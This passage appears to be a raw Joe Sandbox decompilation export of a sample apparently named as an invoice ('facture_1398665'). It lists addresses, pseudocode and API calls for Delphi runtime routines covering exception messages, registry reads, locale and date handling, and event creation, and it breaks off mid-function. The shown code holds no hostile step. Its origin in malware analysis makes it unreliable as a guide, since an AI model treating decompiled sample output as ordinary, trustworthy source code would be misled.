    0x00402b3a
    0x00402b4a
    0x00402b54
    0x00000000
    0x00000000
    0x00402b56
    0x00402b57
    0x00402b5e
    0x00402b5f
    0x00000000
    0x00000000
    0x00402b5f
    0x004027c1
    0x004027c1
    0x004027c7
    0x004027c8
    0x004027c9
    0x00000000
    0x004027cb
    0x004027e4
    0x004027f6
    0x004027fb
    0x004027fd
    0x00402803
    0x0040280a
    0x00000000
    0x0040280a

    APIs
    • MessageBoxA.USER32(00000000,?,00401334,00002010), ref: 00402B8D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 80%
    			E004094C0(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v534;
    				short _v1056;
    				short _v1568;
    				struct _MEMORY_BASIC_INFORMATION _v1596;
    				char _v1600;
    				intOrPtr _v1604;
    				char _v1608;
    				intOrPtr _v1612;
    				char _v1616;
    				intOrPtr _v1620;
    				char _v1624;
    				char* _v1628;
    				char _v1632;
    				char _v1636;
    				char _v1640;
    				struct HINSTANCE__* _t44;
    				intOrPtr _t55;
    				struct HINSTANCE__* _t57;
    				signed int _t76;
    				long _t79;
    				void* _t82;
    				intOrPtr _t83;
    				intOrPtr _t85;
    				intOrPtr _t95;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr* _t102;
    				void* _t105;
    				void* _t113;
    
    				_t113 = __fp0;
    				_v1640 = 0;
    				_v8 = __ecx;
    				_t82 = __edx;
    				_t102 = __eax;
    				_push(_t105);
    				_push(0x40966c);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t105 + 0xfffff99c;
    				VirtualQuery(__edx,  &_v1596, 0x1c);
    				if(_v1596.State != 0x1000) {
    					L2:
    					_t44 =  *0x415b48; // 0x400000
    					GetModuleFileNameW(_t44,  &_v1056, 0x105);
    					_v12 = E004094B4(_t82);
    				} else {
    					_t79 = GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105);
    					_t108 = _t79;
    					if(_t79 != 0) {
    						_t85 = _t82 - _v1596.AllocationBase;
    						__eflags = _t85;
    						_v12 = _t85;
    					} else {
    						goto L2;
    					}
    				}
    				E00408128( &_v534, 0x104, E0040A48C() + 2, _t108);
    				_t83 = 0x409680;
    				_t100 = 0x409680;
    				_t95 =  *0x406d5c; // 0x406db4
    				if(E0040392C(_t102, _t95) != 0) {
    					_t83 = E00404D24( *((intOrPtr*)(_t102 + 4)));
    					_t76 = E004080DC(_t83);
    					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
    						_t100 = 0x409684;
    					}
    				}
    				_t55 =  *0x412c70; // 0x406b7c
    				_t18 = _t55 + 4; // 0xffe7
    				_t57 =  *0x415b48; // 0x400000
    				LoadStringW(E00405B90(_t57),  *_t18,  &_v1568, 0x100);
    				E00403814( *_t102,  &_v1640);
    				_v1636 = _v1640;
    				_v1632 = 0x11;
    				_v1628 =  &_v534;
    				_v1624 = 0xa;
    				_v1620 = _v12;
    				_v1616 = 5;
    				_v1612 = _t83;
    				_v1608 = 0xa;
    				_v1604 = _t100;
    				_v1600 = 0xa;
    				_push( &_v1636);
    				E00408290(_v8,  &_v1568, _a4, _t113);
    				E004080DC(_v8);
    				_t98 = 4;
    				 *[fs:eax] = _t98;
    				_push(E00409673);
    				return L00404C88( &_v1640);
    			}


































    0x004094c0
    0x004094ce
    0x004094d4
    0x004094d7
    0x004094d9
    0x004094dd
    0x004094de
    0x004094e3
    0x004094e6
    0x004094f3
    0x00409502
    0x00409520
    0x0040952c
    0x00409532
    0x0040953e
    0x00409504
    0x00409517
    0x0040951c
    0x0040951e
    0x00409543
    0x00409543
    0x00409549
    0x00000000
    0x00000000
    0x00000000
    0x0040951e
    0x0040956b
    0x00409570
    0x00409575
    0x0040957c
    0x00409589
    0x00409593
    0x00409597
    0x0040959e
    0x004095a8
    0x004095a8
    0x0040959e
    0x004095b9
    0x004095be
    0x004095c2
    0x004095cd
    0x004095da
    0x004095e5
    0x004095eb
    0x004095f8
    0x004095fe
    0x00409608
    0x0040960e
    0x00409615
    0x0040961b
    0x00409622
    0x00409628
    0x00409635
    0x00409644
    0x0040964c
    0x00409655
    0x00409658
    0x0040965b
    0x0040966b

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
    • LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 80%
    			E004094BE(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v534;
    				short _v1056;
    				short _v1568;
    				struct _MEMORY_BASIC_INFORMATION _v1596;
    				char _v1600;
    				intOrPtr _v1604;
    				char _v1608;
    				intOrPtr _v1612;
    				char _v1616;
    				intOrPtr _v1620;
    				char _v1624;
    				char* _v1628;
    				char _v1632;
    				char _v1636;
    				char _v1640;
    				struct HINSTANCE__* _t44;
    				intOrPtr _t55;
    				struct HINSTANCE__* _t57;
    				signed int _t76;
    				long _t79;
    				void* _t82;
    				intOrPtr _t83;
    				intOrPtr _t85;
    				intOrPtr _t95;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr* _t102;
    				void* _t105;
    				void* _t113;
    
    				_t113 = __fp0;
    				_v1640 = 0;
    				_v8 = __ecx;
    				_t82 = __edx;
    				_t102 = __eax;
    				_push(_t105);
    				_push(0x40966c);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t105 + 0xfffff99c;
    				VirtualQuery(__edx,  &_v1596, 0x1c);
    				if(_v1596.State != 0x1000) {
    					L3:
    					_t44 =  *0x415b48; // 0x400000
    					GetModuleFileNameW(_t44,  &_v1056, 0x105);
    					_v12 = E004094B4(_t82);
    				} else {
    					_t79 = GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105);
    					_t108 = _t79;
    					if(_t79 != 0) {
    						_t85 = _t82 - _v1596.AllocationBase;
    						__eflags = _t85;
    						_v12 = _t85;
    					} else {
    						goto L3;
    					}
    				}
    				E00408128( &_v534, 0x104, E0040A48C() + 2, _t108);
    				_t83 = 0x409680;
    				_t100 = 0x409680;
    				_t95 =  *0x406d5c; // 0x406db4
    				if(E0040392C(_t102, _t95) != 0) {
    					_t83 = E00404D24( *((intOrPtr*)(_t102 + 4)));
    					_t76 = E004080DC(_t83);
    					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
    						_t100 = 0x409684;
    					}
    				}
    				_t55 =  *0x412c70; // 0x406b7c
    				_t18 = _t55 + 4; // 0xffe7
    				_t57 =  *0x415b48; // 0x400000
    				LoadStringW(E00405B90(_t57),  *_t18,  &_v1568, 0x100);
    				E00403814( *_t102,  &_v1640);
    				_v1636 = _v1640;
    				_v1632 = 0x11;
    				_v1628 =  &_v534;
    				_v1624 = 0xa;
    				_v1620 = _v12;
    				_v1616 = 5;
    				_v1612 = _t83;
    				_v1608 = 0xa;
    				_v1604 = _t100;
    				_v1600 = 0xa;
    				_push( &_v1636);
    				E00408290(_v8,  &_v1568, _a4, _t113);
    				E004080DC(_v8);
    				_t98 = 4;
    				 *[fs:eax] = _t98;
    				_push(E00409673);
    				return L00404C88( &_v1640);
    			}


































    0x004094be
    0x004094ce
    0x004094d4
    0x004094d7
    0x004094d9
    0x004094dd
    0x004094de
    0x004094e3
    0x004094e6
    0x004094f3
    0x00409502
    0x00409520
    0x0040952c
    0x00409532
    0x0040953e
    0x00409504
    0x00409517
    0x0040951c
    0x0040951e
    0x00409543
    0x00409543
    0x00409549
    0x00000000
    0x00000000
    0x00000000
    0x0040951e
    0x0040956b
    0x00409570
    0x00409575
    0x0040957c
    0x00409589
    0x00409593
    0x00409597
    0x0040959e
    0x004095a8
    0x004095a8
    0x0040959e
    0x004095b9
    0x004095be
    0x004095c2
    0x004095cd
    0x004095da
    0x004095e5
    0x004095eb
    0x004095f8
    0x004095fe
    0x00409608
    0x0040960e
    0x00409615
    0x0040961b
    0x00409622
    0x00409628
    0x00409635
    0x00409644
    0x0040964c
    0x00409655
    0x00409658
    0x0040965b
    0x0040966b

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
    • LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 63%
    			E00403714() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x41201c & 0x0000ffff;
    				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t14 =  *0x41201c & 0xffc0 | _v12 & 0x3f;
    					 *0x41201c = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00403785);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExW(_v8, L"FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x40378c);
    					return RegCloseKey(_v8);
    				}
    			}











    0x00403715
    0x00403717
    0x00403721
    0x0040373d
    0x0040379f
    0x004037a2
    0x004037ab
    0x0040373f
    0x00403741
    0x00403742
    0x00403747
    0x0040374a
    0x0040374d
    0x00403769
    0x00403770
    0x00403773
    0x00403776
    0x00403784
    0x00403784

    APIs
    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403736
    • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403785,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403769
    • RegCloseKey.ADVAPI32(?,0040378C,00000000,?,00000004,00000000,00403785,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 64%
    			E00409140(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x4091d7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00408EB4(GetThreadLocale(), 0x4091f0, 0x100b,  &_v8);
    				_t29 = E00407F10(0x4091f0, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoW(E0040908C, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x415c5c;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoW(E004090C8, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E004091DE);
    				return L00404C88( &_v8);
    			}










    0x00409140
    0x00409143
    0x00409148
    0x00409149
    0x0040914e
    0x00409151
    0x00409167
    0x00409179
    0x00409183
    0x00409193
    0x00409198
    0x0040919d
    0x004091a2
    0x004091a2
    0x004091a8
    0x004091ab
    0x004091ab
    0x004091bc
    0x004091bc
    0x004091c3
    0x004091c6
    0x004091c9
    0x004091d6

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,004091D7,?,?,00000000), ref: 00409158
      • Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409188
    • EnumCalendarInfoW.KERNEL32(Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409193
    • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091B1
    • EnumCalendarInfoW.KERNEL32(Function_000090C8,00000000,00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091BC
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 67%
    			E004091F4(signed int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				void* _t69;
    				signed int _t72;
    				signed int _t75;
    				signed int _t78;
    				signed int _t81;
    				signed int _t97;
    				intOrPtr _t112;
    				void* _t113;
    				signed int _t114;
    				signed int _t122;
    				signed int _t131;
    				intOrPtr _t152;
    				void* _t164;
    				signed int _t166;
    				intOrPtr _t170;
    				void* _t171;
    
    				_t171 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(__ebx);
    				_push(__esi);
    				_t164 = __edx;
    				_v8 = __eax;
    				L00404C80(_v8);
    				_push(_t170);
    				_push(0x409427);
    				 *[fs:eax] = _t170;
    				_t131 = 1;
    				E00404C98(_t164, 0,  *[fs:eax]);
    				E00408EB4(GetThreadLocale(), 0x409444, 0x1009,  &_v16);
    				if(E00407F10(0x409444, 1, _t171) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t69 = E00404EF4(E00404830( &_v8));
    						__eflags = _t131 - _t69;
    						if(_t131 > _t69) {
    							break;
    						}
    						_t166 = _v8;
    						__eflags = _t166;
    						if(_t166 != 0) {
    							__eflags =  *((short*)(_t166 - 0xa)) - 2;
    							if( *((short*)(_t166 - 0xa)) != 2) {
    								_t166 = E00404820( &_v8);
    							}
    						}
    						__eflags =  *((short*)(_t166 + _t131 * 2 - 2)) - 0xd800;
    						if( *((short*)(_t166 + _t131 * 2 - 2)) < 0xd800) {
    							L22:
    							_t72 = E00408164(_v8 + _t131 * 2 - 2, 2, 0x409448);
    							__eflags = _t72;
    							if(_t72 != 0) {
    								_t75 = E00408164(_v8 + _t131 * 2 - 2, 4, L"yyyy");
    								__eflags = _t75;
    								if(_t75 != 0) {
    									_t78 = E00408164(_v8 + _t131 * 2 - 2, 2, L"yy");
    									__eflags = _t78;
    									if(_t78 != 0) {
    										_t81 = ( *(_v8 + _t131 * 2 - 2) & 0x0000ffff) - 0x59;
    										__eflags = _t81;
    										if(_t81 == 0) {
    											L30:
    											E00404F98(_t164, 0x4094b0);
    											L32:
    											_t131 = _t131 + 1;
    											__eflags = _t131;
    											continue;
    										}
    										__eflags = _t81 != 0x20;
    										if(_t81 != 0x20) {
    											E00404E04();
    											E00404F98(_t164, _v28);
    											goto L32;
    										}
    										goto L30;
    									}
    									E00404F98(_t164, 0x40949c);
    									_t131 = _t131 + 1;
    									goto L32;
    								}
    								E00404F98(_t164, L"eeee");
    								_t131 = _t131 + 3;
    								goto L32;
    							}
    							E00404F98(_t164, 0x40945c);
    							_t131 = _t131 + 1;
    							goto L32;
    						} else {
    							__eflags =  *((short*)(_t166 + _t131 * 2 - 2)) - 0xdfff;
    							if( *((short*)(_t166 + _t131 * 2 - 2)) > 0xdfff) {
    								goto L22;
    							}
    							_t97 = E0040A3F8(_v8, _t131, _t131, _t166) >> 1;
    							if(__eflags < 0) {
    								asm("adc eax, 0x0");
    							}
    							_v12 = _t97;
    							E0040525C(_v8, _t131, _t131, _t164, _t166,  &_v24);
    							E00404F98(_t164, _v24);
    							_t131 = _t131 + _v12;
    							continue;
    						}
    					}
    					L34:
    					_pop(_t152);
    					 *[fs:eax] = _t152;
    					_push(E0040942E);
    					L00404C90( &_v28, 4);
    					return L00404C88( &_v8);
    				}
    				_t112 =  *0x415c34; // 0x9
    				_t113 = _t112 - 4;
    				if(_t113 == 0 || _t113 + 0xfffffff3 - 2 < 0) {
    					_t114 = 1;
    				} else {
    					_t114 = 0;
    				}
    				if(_t114 == 0) {
    					E00404C98(_t164, _v8);
    				} else {
    					while(_t131 <= E00404EF4(E00404830( &_v8))) {
    						_t122 = ( *(_v8 + _t131 * 2 - 2) & 0x0000ffff) - 0x47;
    						__eflags = _t122;
    						if(_t122 != 0) {
    							__eflags = _t122 != 0x20;
    							if(_t122 != 0x20) {
    								E00404E04();
    								E00404F98(_t164, _v20);
    							}
    						}
    						_t131 = _t131 + 1;
    						__eflags = _t131;
    					}
    				}
    			}

























    0x004091f4
    0x004091f9
    0x004091fa
    0x004091fb
    0x004091fc
    0x004091fd
    0x004091fe
    0x004091ff
    0x00409200
    0x00409202
    0x00409204
    0x0040920a
    0x00409211
    0x00409212
    0x0040921a
    0x0040921d
    0x00409226
    0x0040923e
    0x00409256
    0x004093ef
    0x004093f7
    0x004093fc
    0x004093fe
    0x00000000
    0x00000000
    0x004092ca
    0x004092cd
    0x004092cf
    0x004092d6
    0x004092da
    0x004092e7
    0x004092e7
    0x004092da
    0x004092e9
    0x004092f0
    0x00409332
    0x00409343
    0x00409348
    0x0040934a
    0x0040936f
    0x00409374
    0x00409376
    0x0040939a
    0x0040939f
    0x004093a1
    0x004093ba
    0x004093ba
    0x004093be
    0x004093c6
    0x004093cd
    0x004093ee
    0x004093ee
    0x004093ee
    0x00000000
    0x004093ee
    0x004093c0
    0x004093c4
    0x004093df
    0x004093e9
    0x00000000
    0x004093e9
    0x00000000
    0x004093c4
    0x004093aa
    0x004093af
    0x00000000
    0x004093af
    0x0040937f
    0x00409384
    0x00000000
    0x00409384
    0x00409353
    0x00409358
    0x00000000
    0x004092f2
    0x004092f2
    0x004092f9
    0x00000000
    0x00000000
    0x00409305
    0x00409307
    0x00409309
    0x00409309
    0x0040930c
    0x0040931b
    0x00409325
    0x0040932a
    0x00000000
    0x0040932a
    0x004092f0
    0x00409404
    0x00409406
    0x00409409
    0x0040940c
    0x00409419
    0x00409426
    0x00409426
    0x0040925c
    0x00409261
    0x00409264
    0x00409272
    0x0040926e
    0x0040926e
    0x0040926e
    0x00409276
    0x004092c0
    0x00409278
    0x004092a5
    0x00409284
    0x00409284
    0x00409288
    0x0040928a
    0x0040928e
    0x00409295
    0x0040929f
    0x0040929f
    0x0040928e
    0x004092a4
    0x004092a4
    0x004092a4
    0x004092b6

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,00409427,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040922F
      • Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 63%
    			E00409D3C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				short _v558;
    				char _v564;
    				intOrPtr _v568;
    				char _v572;
    				char _v576;
    				char _v580;
    				intOrPtr _v584;
    				char _v588;
    				void* _v592;
    				char _v596;
    				char _v600;
    				char _v604;
    				char _v608;
    				intOrPtr _v612;
    				char _v616;
    				char _v620;
    				char _v624;
    				void* _v628;
    				char _v632;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v632 = 0;
    				_v596 = 0;
    				_v604 = 0;
    				_v600 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x409ef7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffd8c;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x412c04; // 0x406bac
    					E004063E4(_t52,  &_v8);
    				} else {
    					_t86 =  *0x412c80; // 0x406ba4
    					E004063E4(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
    					_v628 =  *(_t89 + 0xc);
    					_v624 = 5;
    					_v620 = _v8;
    					_v616 = 0x11;
    					_v612 = _t110;
    					_v608 = 5;
    					_push( &_v628);
    					_t60 =  *0x412c0c; // 0x406b4c
    					E004063E4(_t60,  &_v632, 2);
    					E00409860(_t89, _v632, 1, _t108, _t110);
    				} else {
    					_v592 =  *(_t89 + 0xc);
    					_v588 = 5;
    					E00404E50( &_v600, 0x105,  &_v558);
    					E00408028(_v600,  &_v596);
    					_v584 = _v596;
    					_v580 = 0x11;
    					_v576 = _v8;
    					_v572 = 0x11;
    					_v568 = _t110;
    					_v564 = 5;
    					_push( &_v592);
    					_t82 =  *0x412c38; // 0x406c1c
    					E004063E4(_t82,  &_v604, 3);
    					E00409860(_t89, _v604, 1, _t108, _t110);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E00409EFE);
    				L00404C88( &_v632);
    				L00404C90( &_v604, 3);
    				return L00404C88( &_v8);
    			}

































    0x00409d3c
    0x00409d49
    0x00409d4f
    0x00409d55
    0x00409d5b
    0x00409d61
    0x00409d66
    0x00409d67
    0x00409d6c
    0x00409d6f
    0x00409d75
    0x00409d7c
    0x00409d90
    0x00409d95
    0x00409d7e
    0x00409d81
    0x00409d86
    0x00409d86
    0x00409d9a
    0x00409da7
    0x00409db3
    0x00409e6f
    0x00409e75
    0x00409e7f
    0x00409e85
    0x00409e8c
    0x00409e92
    0x00409e9f
    0x00409ea8
    0x00409ead
    0x00409ebf
    0x00409dd6
    0x00409dd9
    0x00409ddf
    0x00409df7
    0x00409e08
    0x00409e13
    0x00409e19
    0x00409e23
    0x00409e29
    0x00409e30
    0x00409e36
    0x00409e43
    0x00409e4c
    0x00409e51
    0x00409e63
    0x00409e68
    0x00409ec8
    0x00409ecb
    0x00409ece
    0x00409ed9
    0x00409ee9
    0x00409ef6

    APIs
      • Part of subcall function 004063E4: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00406429
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00409EF7), ref: 00409DA7
    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00409EF7), ref: 00409DC9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040A186() {
    				LONG* _t9;
    				void* _t10;
    				void* _t11;
    
    				_t10 = 0;
    				_t11 = 0x20;
    				_t9 = 0x415ca4;
    				while( *_t9 != 0 || InterlockedCompareExchange(_t9, 1, 0) != 0) {
    					_t9 =  &(_t9[2]);
    					_t11 = _t11 - 1;
    					if(_t11 != 0) {
    						continue;
    					} else {
    						if(_t10 == 0) {
    							_t10 = CreateEventW(0, 0, 0, 0);
    						}
    						ResetEvent(_t10);
    					}
    					L10:
    					return _t10;
    				}
    				if(_t9[1] == 0) {
    					_t9[1] = CreateEventW(0, 0, 0, 0);
    				}
    				_t3 =  &(_t9[1]); // 0x0
    				_t10 =  *_t3;
    				goto L10;
    			}






    0x0040a18b
    0x0040a18d
    0x0040a192
    0x0040a197
    0x0040a1c5
    0x0040a1c8
    0x0040a1c9
    0x00000000
    0x0040a1cb
    0x0040a1cd
    0x0040a1dc
    0x0040a1dc
    0x0040a1df
    0x0040a1df
    0x0040a1e4
    0x0040a1e9
    0x0040a1e9
    0x0040a1ae
    0x0040a1bd
    0x0040a1bd
    0x0040a1c0
    0x0040a1c0
    0x00000000

    APIs
    • InterlockedCompareExchange.KERNEL32(00415CA4,00000001,00000000), ref: 0040A1A1
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00415CA4,00000001,00000000), ref: 0040A1B8
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A1D7
    • ResetEvent.KERNEL32(00000000), ref: 0040A1DF
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 98%
    			E004027B8(void* __eax, void* __fp0) {
    				void* _v8;
    				char _v110600;
    				char _v112644;
    				char _v112645;
    				signed int _v112652;
    				char _v112653;
    				char _v112654;
    				char _v112660;
    				intOrPtr _v112664;
    				intOrPtr _v112668;
    				intOrPtr _v112672;
    				signed short* _v112676;
    				void* _v112680;
    				char _v129064;
    				char _v131113;
    				char _v161832;
    				void* _t70;
    				int _t76;
    				intOrPtr _t79;
    				intOrPtr _t90;
    				CHAR* _t94;
    				intOrPtr _t96;
    				void* _t106;
    				intOrPtr _t107;
    				intOrPtr _t113;
    				intOrPtr _t118;
    				void* _t128;
    				intOrPtr _t129;
    				intOrPtr _t133;
    				signed int _t143;
    				int _t148;
    				intOrPtr _t149;
    				char* _t151;
    				char* _t152;
    				char* _t153;
    				char* _t154;
    				char* _t155;
    				char* _t156;
    				char* _t158;
    				char* _t159;
    				char* _t164;
    				char* _t165;
    				intOrPtr _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr* _t203;
    				void* _t205;
    				void* _t206;
    				signed int _t211;
    				void* _t214;
    				void* _t215;
    				void* _t228;
    
    				_push(__eax);
    				_t70 = 0x27;
    				goto L1;
    				L12:
    				while(_t197 != 0x413a24) {
    					_t76 = E004021E4(_t197);
    					_t148 = _t76;
    					__eflags = _t148;
    					if(_t148 == 0) {
    						L11:
    						_t197 =  *((intOrPtr*)(_t197 + 4));
    						continue;
    					} else {
    						goto L4;
    					}
    					do {
    						L4:
    						_t211 =  *(_t148 - 4);
    						__eflags = _t211 & 0x00000001;
    						if((_t211 & 0x00000001) == 0) {
    							__eflags = _t211 & 0x00000004;
    							if(__eflags == 0) {
    								__eflags = _v112652 - 0x1000;
    								if(_v112652 < 0x1000) {
